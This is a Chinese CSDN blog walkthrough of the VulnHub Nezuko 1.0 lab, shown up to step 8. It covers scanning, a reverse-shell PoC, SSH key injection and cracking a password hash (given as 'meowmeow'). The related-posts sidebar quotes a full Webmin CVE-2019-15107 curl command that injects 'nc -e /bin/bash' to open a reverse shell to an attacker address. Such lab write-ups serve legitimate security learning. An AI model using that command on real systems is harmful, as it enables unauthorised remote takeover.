以VulnHub靶场Nezuko 1.0为例总结红队套路(1)

最新推荐文章于 2023-09-12 20:33:48 发布
最新推荐文章于 2023-09-12 20:33:48 发布
阅读量456 收藏
点赞数
分类专栏: 计算机基础 文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29566629/article/details/123002610
版权

前言:
Vulnhub简介
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。网址:https://www.vulnhub.com。

靶场说明

Nezuko1.0 是一个难度为中等的Boot2root/CTF挑战,由@yunaranyancat (Twitter)制作

描述:

  难度等级 : 中等

  操作系统类型:Ubuntu 18.04

  用户: root,zenitsu, nezuko

  flag目录 : 在用户家目录中

任务:

  获取三个用户目录下的flag

  1. 扫描本网段存活主机
    在这里插入图片描述

  2. 使用nmap扫描开放端口:
    在这里插入图片描述

  3. 访问这个特殊端口13337
    这时候如果无法访问,就要试试https:// 成功进入:
    在这里插入图片描述

  4. 使用poc攻击,反向连接拿到shell(具体poc会使用就行,关键是过程)
    在本地开启监控端口:
    在这里插入图片描述
    执行poc,拿到shell:
    在这里插入图片描述

  5. 这种shell使用很不方便,注意到靶机开启了22端口,考虑可以使用写入公钥的方式来进行ssh连接,具体过程可以参考这篇博客,ssh成功连接:
    在这里插入图片描述

  6. ssh拿到的只是一个普通用户,其中有个文件:
    在这里插入图片描述

  7. 那我们就查看一下这个zenitsu这个用户的情况,cat /etc/passwd
    在这里插入图片描述
    红框部分就是这个用户密码的hash值,可以使用john the ripper 进行破解,破解的结果为:meowmeow

  8. 登录zenitsu这个账户,查看文件:
    在这里插入图片描述

可以看到sh这个文件属于zenitsu这个用户,root这个组,

qq_29566629
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NEZUKO: 1——202201152003
32bin的博客
01-24 2701
echo -n "Testing for RCE (CVE-2019-15107) on $URI: "; curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|nc -e /bin/bash 192.168.219.177 4444&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content
VulnHub渗透测试实战靶场 - Breach 1.0
LYJ20010728的博客
08-04 1109
Vulnhub - Breach-1.0环境下载Breach-1.0靶机搭建渗透过程信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Breach-1.0靶机搭建 将下载好的靶机环境,用VMware导入即可使用 VMware虚拟机配置有静态IP地址:192.168.110.140,需要将虚拟机网卡设置为host-only方式 攻击机IP:192.168.110.128 靶机IP:192.168.110.140 渗透过程 信息搜集 使用arp-scan来检测我们的目
VulnHub Red进行渗透测试的总结与过程
雨泽网络工作室
11-18 629
VulnHub Red进行渗透测试的总结与过程
MISC方向MeowMeowMeow解题方法
qq_62729556的博客
05-28 1567
这个时候向上找,找到最开始出现规律的位置,会发现与题目给的flag格式CatCTF{}一样,这个时候就可以确认这个是flag。通过好多工具都没有找到flag,突发奇想通过010工具打开MeowMeow.png。当划到最下面的时候,发现了那些乱码有一定的规律。最终得到的flag为。
攻防世界--MeowMeowMeow
最新发布
qq_73611185的博客
09-12 1241
明显发现不一样的地方,鼠标下滑识别字母得到:CATCTF{CAT_GOES_MEOW}即flag: CATCTF{CAT_GOES_MEOW}成为ctf全栈之路之misc第四题。
攻防世界re-for-50-plz-50
qq_51303140的博客
03-27 605
攻防世界 逆向 re-for-50-plz-50
Nepnep x CatCTF Writeup
http://www.lunatic007.top/
01-03 1566
Nepnep x CatCTF Writeup
攻防世界-re-for-50-plz-50
qq_45771413的博客
04-19 466
查壳 IDA 提示MIPS,但还是能进去。 F5查看伪代码: argv是flag,argv和0^37异或后的值是全局变量meow的值 EXP arr='cbtcqLUBChERV[[Nh@_X^D]X_YPV[CJ' flag='' for i in arr: flag=chr(ord(i)^0x37) print(flag,end='') flag TUCTF{but_really_whoisjohngalt} 坑&填坑 这题是2020.2留的坑,不应该这么简单。搜了下别的wp,发现这题没法正常F
【防攻世界】misc解题思路-学习笔记
ZhangAweio的博客
04-10 509
这道题就很离谱,flag需要用010工具打开,拉到最后就可以看到文字样式。丢进 kali 或者其他Linux系统直接。
hackergame 2018
Risker
10-16 4216
欢迎关注我的新博客:http://mmmmmmlei.cn 做了做中科大的hackergame,感觉不是传统的CTF,偏重于趣味性。做了一天多就没做了… 签到题 提交 hackergame2018 即可,但是输入框进行了限制,改一下输入框限制大小就可以了(或者抓包发)。 flag{Hackergame2018_Have_Fun!} 猫咪问答 emmmmm 中科大的特色题,问的就是中科大的一些东...
Vulnhub-shenron-1
lionwerson的博客
01-05 1723
nmap扫描端口: nmap 192.168.0.19 -p- ???? 开放80端口和22端口 web浏览器打开80端口: ???? Apache服务的默认页面 web扫描器识别到是joomla框架: gobuster扫描joomal后台路径: gobuster.exe dir -u http://192.168.0.19/joomla/ -w dir.txt ???? 后台路径是joomla/administrator/index.php 登录名和密码在/test/password文件的
vulnhub靶场渗透实战13-driftingblues3
随心所欲不逾矩
12-07 657
靶机下载地址:https://download.vulnhub.com/driftingblues/driftingblues3.ovavbox导入,网络模式桥接,靶机模式为简单。 源代码上发现一串密文。 ssh登录验证日志。前面说有毒,可能日志中毒。身份验证日志,并且注意到登录用户名显示在日志中,也就是说如果我们使用ssh登陆时,将用户名写成一句话就可以写马进日志中。 写入成功。 那就反弹一下shell吧。
VulnHub——GeminiIncV2
热门推荐
江左盟的博客
11-22 1万+
简介 个人感觉靶机设计还不错,通过注册账户,枚举激活码,然后在网页源码中发现密码Hash值,通过解密后的明文登录系统后利用命令执行绕过漏洞获取shell,最后利用Redis服务提升至root权限。 信息收集 使用nmap --min-rate 10000 -A 192.168.58.134 --script=vuln扫描目标主机发现开启22和80端口,80端口web服务存在admin、inc、lib目录和login.php文件,如图: 访问80端口如图: 访问login.php文件为登录页面,如图:
[VulnHub靶机]Lin.Security_linux提权
qq_45927819的博客
03-15 2171
靶机描述 在in.security,我们希望开发一个Linux虚拟机,该虚拟机在编写本文时基于最新的Ubuntu发行版(18.04 LTS),但存在许多漏洞,这些漏洞使用户无法升级扎根在盒子上。旨在帮助理解某些内置应用程序和服务(如果配置错误)可能会被攻击者滥用。 首先,您可以使用以下凭据登录主机:bob / secret 下载地址:https://in.security/downloads/lin.security_v1.0.ova 靶机IP:192.168.56.106 直接ssh连接: ssh bob
[XCTF] [tu-ctf-2016] 逆向 re-for-50-plz-50
0of_blog
05-27 209
下载附件,照常看一下文件类型 emmm,居然是mips架构的。本来还行运行看看的, 丢进IDA,F5看伪代码 int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int i; // [sp+18h] [+18h] for ( i = 0; i < 31; ++i ) { if ( meow[i] != (char)(argv[1][i] ^ 0x37) ) ..
Vulnhub靶场渗透-theEther
paidx0
10-03 1252
前言 这次的靶机还是很好玩的,有点难度折腾了挺久,但方法对了那就很容易了 靶机ip(192.168.110.129) 攻击机ip(192.168.110.127) 网络NAT模式 不废话了直接开始 信息收集 打开网页简单看了看,没有过多的内容,是个基因的论文网站 网站没有太多的功能,而且扫目录也没扫到什么有价值的东西 最开始以为网站上的这些单词可能会用到,就利用他们做了个字典去爆破 ssh,显然我的方法就是错的 漏洞挖掘 注意到这个位置很有可能是利用存在读文件,简单尝试了几次Apache的日志文件
攻击手法二
weixin_43977912的博客
05-10 774
四、 浑水摸鱼——社工钓鱼突破系统 社会工程学(简称社工)在工作中占据着半壁江山,而钓鱼攻击则是社工中的最常使用的套路。钓鱼攻击通常具备一定的隐蔽性和欺骗性,不具备网络技术能力的人通常无法分辨内容的真伪;而针对特定目标及群体精心构造的鱼叉钓鱼攻击则可令具备一定网络技术能力的人防不胜防,可谓之渗透利器。 小D团便接到这样一个工作目标:某企业的财务系统。通过前期踩点和信息收集发现,目标企业外网开放系统非常少,也没啥可利用的漏洞,很难通过打点的方式进入到内网。 不过还是让他们通过网上搜索以及一些开源社工库中
在kali中演示如何超级详细安装漏洞靶场Vulhub
weixin_54787877的博客
03-13 1697
前言 我们都知道,在学习网络安全的过程中,搭建漏洞靶场有着至关重要的作用。复现各种漏洞,能更好的理解漏洞产生的原因,提高自己的学习能力。下面我在kali中演示如何详细安装漏洞靶场Vulhub。 什么是Vulhub? Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。Vulhub的官方地址为www.vulhub.org。 安装docker 因为Vulh...
常用攻击套路
weixin_43977912的博客
05-06 3129
的实战过程中,专家们逐渐摸出了一些套路总结了一些经验:有后台或登录入口的,会尽量尝试通过弱口令等方式进入系统;找不到系统漏洞时,会尝试社工钓鱼,从人开展突破;有安全防护设备的,会尽量少用或不用扫描器,使用EXP力求一击即中;针对防守严密的系统,会尝试从子公司或供应链来开展工作;建立据点过程中,会用多种手段多点潜伏,防患于未然。 下面介绍九种最常用的攻击战术。 一、 利用弱口令获得权限 弱密码、默认密码、通用密码和已泄露密码通常是专家们关注的重点。实际工作中,通过弱口令获得权限的情况占据9
ATT\\\\&CK评估实战靶场
08-16
ATT&CK评估实战靶场四是一个实战训练场景,其中使用了phpmyadmin来利用数据库日志写入马来获取会话。具体的方法和之前的靶场一类似,你可以去查看相关链接了解更多细节。在攻击机要访问52网段的资源时,可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值